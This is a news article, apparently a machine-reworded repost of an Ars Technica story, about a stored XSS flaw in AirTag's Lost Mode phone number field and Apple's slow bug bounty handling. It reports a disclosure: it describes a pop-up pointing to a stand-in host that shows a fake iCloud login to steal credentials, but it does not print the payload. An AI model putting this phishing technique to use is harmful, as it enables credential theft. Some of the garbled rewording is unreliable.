A simple mistake made AirTag users vulnerable to attack

Date:

Share post:


Hit rate retention Entering Apple’s bug bounty program, security researchers said that the program’s response to its vulnerability reports was slow and inconsistent.

This time, Today’s injury It was due to the failure to clean up user input fields-especially the phone number field used by the AirTag owner to identify the missing device.

Security consultant and penetration tester Bobby Rauch discovered that Apple’s AirTags-tiny devices that can be attached to frequently lost items such as laptops, cell phones or car keys-do not sanitize user input. This negligence opened the door for AirTags to be used for launching attacks. An attacker can drop a maliciously prepared AirTag instead of inserting a USB drive loaded with malware into the target parking lot.

This attack does not require much technical know-how-the attacker only needs to enter a valid XSS in the AirTag’s phone number field, then put the AirTag in Lost Mode and place it where the target might find it. In theory, scanning for lost AirTags is a safe operation-it will only pop up a web page on https://found.apple.com/. The problem is that found.apple.com then embeds the content of the phone number field into the website, as displayed on the victim’s browser, unsterilized.

Rauch reports that the most obvious way to exploit this vulnerability is to use a simple XSS to pop up a fake iCloud login dialog on the victim’s phone. This doesn’t need much in terms of code at all.

If found.apple.com inadvertently embeds the above XSS in the scanned AirTag response, the victim will get a pop-up window displaying the contents of badside.tld/page.html. This could be a zero-day exploit in the browser or just a phishing dialog. Rauch assumes a fake iCloud login dialog, which can look like the real thing-but it will dump the victim’s Apple credentials to the target server.

Although this is a compelling exploit, it is by no means the only vulnerability available-anything you can perform on a web page is available on the desktop. This ranges from the simple phishing seen in the example above to exposing the victim’s phone to a zero-day no-click browser vulnerability.

More technical details—as well as a simple video showing the vulnerability and the network activity generated by Rauch’s use of the vulnerability—are available in Rauch’s public disclosure on Medium.

This public disclosure from Apple

According to a report by Krebs on Security, the reason why Rauch publicly disclosed the vulnerability was mainly due to Apple’s communication failure-this is an increasingly common statement.

Rauch told Krebs that he initially disclosed the vulnerability to Apple privately on June 20, but within three months, the company only told him that it was “still under investigation.” This is a strange response, which seems to be a very simple error to verify and mitigate. Last Thursday, Apple sent an email to Rauch, stating that the vulnerability will be resolved in an upcoming update and asking him not to talk about it publicly during this period.

Apple never answered the basic questions raised by Rauch, such as whether it has a timetable for fixing errors, whether it plans to attribute the report to him, and whether it is eligible for a bounty. Cupertino’s lack of communication prompted Rauch to list on Medium, despite the fact that Apple requires researchers to remain silent about their findings if they want to receive honor and/or compensation for their work.

Rauch expressed his willingness to work with Apple, but asked the company to “provide some details about when you plan to fix this issue and whether there will be any endorsements or error bounties.” He also warned the company that he plans to do so within 90 days release. Rauch said Apple’s response was “basically, if you don’t divulge this, we would be very grateful.”

We have contacted Apple for comments.

This story originally appeared in Ars Technica.


More exciting connected stories



Source link

LEAVE A REPLY

Please enter your comment!
Please enter your name here

18 − 13 =

spot_img

Related articles